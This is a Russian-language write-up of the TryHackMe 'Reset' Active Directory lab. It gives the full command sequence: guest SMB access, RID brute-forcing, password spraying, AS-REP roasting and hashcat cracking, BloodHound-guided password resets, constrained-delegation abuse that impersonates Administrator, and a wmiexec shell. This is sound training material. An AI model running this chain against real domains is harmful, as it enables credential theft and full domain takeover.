Reset — прохождение сложной машины от Tryhackme

Краткое описание

Годная машина на тему Windows AD, Kerberos. В начале разведки получаем доступ к гостевой шаре. Оттуда достаем файл с паролем, но не знаем от какой учетной записи. Проводим разведку юзеров, получаем список и находим 1 пользователя к которому подходит этот пароль. Далее проводим разведку с помощью BloodHound и по цепочке получаем доступ к нескольким аккаунтам у последнего есть права Unconstrained Delegation Privilege на доменный компьютер. С помощью механизма S4U2self, запрашиваем билет на имя администратора и захватываем компьютер.

---

Разведка (T1595.002)

Первичный анализ цели, сбор информации.

PORT     STATE SERVICE       VERSION53/tcp   open  domain        Simple DNS Plus88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-19 12:08:47Z)135/tcp  open  msrpc         Microsoft Windows RPC139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)445/tcp  open  microsoft-ds?464/tcp  open  kpasswd5?593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp  open  tcpwrapped3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)3269/tcp open  tcpwrapped3389/tcp open  ms-wbt-server Microsoft Terminal Services

Здесь у нас порты, характерные для Active Directory. Полный набор от smb до rdp. Также видим домен, который добавляем в /etc/hosts.

---

Перечисление

Начнем с smb шар, пробуем узнать базовую информацию и доступено нам, хоть что-то с гостевым аккаунтом.

nxc smb 10.114.158.248  -u 'guest' -p '' SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 / Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\guest: 

Гостя в этой машине принимают за своего, поэтом проведем разведку шар и юзеров.

Список юзеров на данном этапе получить не удалось, однако список шар есть.

 ~  nxc smb 10.114.158.248  -u 'guest' -p '' --shares --users                                SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 / Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\guest: SMB         10.114.158.248  445    HAYSTACK         [*] Enumerated sharesSMB         10.114.158.248  445    HAYSTACK         Share           Permissions     RemarkSMB         10.114.158.248  445    HAYSTACK         -----           -----------     ------SMB         10.114.158.248  445    HAYSTACK         ADMIN$                          Remote AdminSMB         10.114.158.248  445    HAYSTACK         C$                              Default shareSMB         10.114.158.248  445    HAYSTACK         Data            READ,WRITE      SMB         10.114.158.248  445    HAYSTACK         IPC$            READ            Remote IPCSMB         10.114.158.248  445    HAYSTACK         NETLOGON                        Logon server share SMB         10.114.158.248  445    HAYSTACK         SYSVOL                          Logon server share 

Шара Data выглядит интересно. Заходим по домену без пароля.

Видим 3 файла, причем через некоторое время они меняют свои имена. Никогда ранее такого не видел, но да ладно. Я решил скачать txt файл, он весит, практически ничего.

get g1di0c4x.tb5.txtgetting file \onboarding\g1di0c4x.tb5.txt of size 521 as g1di0c4x.tb5.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

Его содержимое выглядит вот так:

Subject: Welcome to Reset - Dear <USER>,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ********We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team

Отлично, у нас есть пароль, однако от какого он пользователя, еще предстоит выяснить.

Выше я писал, что список пользователей достать не удалось. Однако если использовать nxc smb с флагом —rid-brute, то пользаки прекрасно дампятся. Всю портянку постить не буду…

Первая атака

Отлично, теперь у нас есть список пользователей, однако в таком виде, нельзя закинуть в netexec, чтобы он проверил к какому именно пользователю подходит пароль.

Весь вывод —rid-brute я сохоанил в файл users.txt. Далее при помощи утилиты awk удалил все лишние столбцы, префиксы и пробелы.

awk -F'\\\\| \\(' '/SidTypeUser/ {print $2}' user.txt > users1.txt

/SidTypeUser/ — ищет только те строки, где типом объекта является пользователь (игнорирует группы и алиасы).

-F’\\| \(’ — говорим awk, что строка делится либо по обратному слэшу \ (в домене THM), либо по комбинации “пробел + открывающая скобка” (.

{print $2} — выводит ровно то, что находится между ними (имя пользователя).

users1.txt — сохраняет результат в новый файл.

Вот с этим файлом, уже можно штурмовать пользователей.

 ~  nxc smb 10.114.158.248  -u 'users1.txt' -p '******!' ... SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\LILY_ONEILL:****** (Guest)

Я конечно расчитывал, что найденный пользователь будет более привилегированным, однако для начала и так сойдет.

Попробовал подключится по rdp, проверил smb шары, но ничего полезного не нашел.

Далее я решил проверить Kerberos. В impacket есть модуль GetNPUsers, который используется для атаки типа AS-REP Roasting в Active Directory.

Он позволяет получить Kerberos AS-REP хеши пользователей, у которых отключена опция “Do not require Kerberos preauthentication”.

Перед этим можно еще проверить, что все пользователи валидные.

 ~  kerbrute userenum users1.txt \  -d thm.corp \  --dc 10.114.158.248

А далее запускаем impacket…

~  impacket-GetNPUsers thm.corp/ -no-pass \  -usersfile /tmp/users1.txt \  -dc-ip 10.114.158.248 \  -format hashcat

Здесь 3 пользователя, которые любезно предоставили хэши. Ломается только 1 и это TABATHA_BRITT.

Далее ломаем через hashcat, он уже сам умеет определять тип хэша.

hashcat ker.txt /usr/share/wordlists/rockyou.txt

Разведка в домене

Этот пользователь, уже имеет право пользоваться благами человечества и rdp. Подключаемся, но флага здесь нет. Побродив по папкам, ничего интересного не нашел, поэтому поехали собирать инфу и осматриваться непосредственно в домене, кто мы и что мы.

Заводим BloodHound и собираем, все, что можем.

bloodhound-ce-python -d thm.corp -ns 10.114.158.248 \     -dc thm.corp --zip -c all \     -u 'TABATHA_BRITT' -p '*******'

На выходе получаем архив, загружаем и смотрим.

Здесь у нас картина прямо скажем очень хорошая.

Прямо сейчас мы сможем абьюзить пользователя SHAWNA_BRAY, поскольку имеем права GenericAll, после этого поменяем пароль пользователю CRUZ_HALL и такой же процедурой получаем доступ до DARLA_WINTERS.

Горизонтальное перемещение

В Bloodhound написано как получить доступ к пользователям. Используем существующие креды для горизонтального перемещения.

net rpc password "SHAWNA_BRAY" "newP@ssword2022" -U "thm.corp"/"TABATHA_BRITT"%"password" -S "thm.corp"

Затем повторяем процедуру и оказываемся под пользователем DARLA_WINTERS.

Повышение привелегий

Еще раз нужно внимательно изучить BloodHound.

Мы видим в разделе Execution Prirvilege — Constrained Delegation. В Active Directory delegation позволяет сервису действовать от имени другого пользователя.

Именно в Constrained Delegation сервис может делегировать TGS только к определённым сервисам.

На что еще нужно обратить внимание. Trusted For Constrained Delegation: TRUE и AllowedToDelegate: cifs/HayStack.thm.corp. Это означает, что пользователь DARLA_WINTERS может получать Kerberos service tickets к CIFS на HAYSTACK от имени любого пользователя домена.

А CIFS = SMB.

Поэтому остается только проэксплуатировать этот мисконфиг и получить билет админа.

impacket-getST -spn 'cifs/haystack.thm.corp' -impersonate Administrator -dc-ip 'thm.corp' 'thm.corp/DARLA_WINTERS:newP@ssword2022'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping...[*] Getting TGT for user[*] Impersonating Administrator[*] Requesting S4U2self[*] Requesting S4U2Proxy[*] Saving ticket in Administrator@cifs_haystack.thm.corp@THM.CORP.ccache

Здесь очень легко ошибиться и прописать неверный spn. Очень хорошая статья на эту тему https://blog.deephacking.tech/en/posts/constrained-delegation-y-resource-based-constrained-delegation/

Если указать spn без полного доменного имени, то билет все равно выпишется, однако залогинится у меня не вышло.

Далее импортируем полученный билет в сессию через переменную KRB5CCNAME.

export KRB5CCNAME=/tmp/Administrator@cifs_HAYSTACK@THM.CORP.ccache

Логинимся в систему и читаем флаги

Осталось только залогиниться.

impacket-smbexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP/Administrator@haystack.thm.corp'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.

Попробовал через psexec…

impacket-psexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on haystack.thm.corp.....[*] Found writable share ADMIN$[*] Uploading file rUxIcyGE.exe[*] Opening SVCManager on haystack.thm.corp.....[*] Creating service JSZX on haystack.thm.corp.....[*] Starting service JSZX.....[*] Opening SVCManager on haystack.thm.corp.....[-] Error performing the uninstallation, cleaning up

Тоже борода.

Почему wmiexec работает там, где другие терпят неудачу: smbexec и psexec используют создание служб Windows через диспетчер служб, что требует записи исполняемых файлов на диск и управления жизненным циклом служб. wmiexec работает через WMI (Windows Management Instrumentation), выполняя команды с помощью Win32_Process.Create() без изменения файловой системы или инфраструктуры служб. Он работает тише, оставляет меньше следов для анализа и обходит проблемы с правами доступа на уровне файлов, которые мешали другим инструментам.

impacket-wmiexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\>whoamithm\administrator

И вот он сработал идельно.

Осталось прочитать флаг.

C:\Users\Administrator\Desktop>type root.txtTHM{SOME_FLAG_ROOT_IS_HERE}

Да, я забыл, что есть еще юзер флаг. Он был в папке пользователя automate.

C:\Users\automate\Desktop>type user.txtTHM{USER_FLAG_IS_HERE}

Видимо, я не понял задумку автора и пошел не тем путем, однако я решил таким образом.

---

Извлечённые уроки

• Урок 1 — всегда проводить качественную разведку

• Урок 2 — внимательно прописывать spn, из-за него может не получится залогиниться в систему.

• Урок 3 — даже если ошибка возникает в одной утилите, нужно использовать альтернативные.

---

MITRE ATT&CK Mapping

Райтап от @alfabuster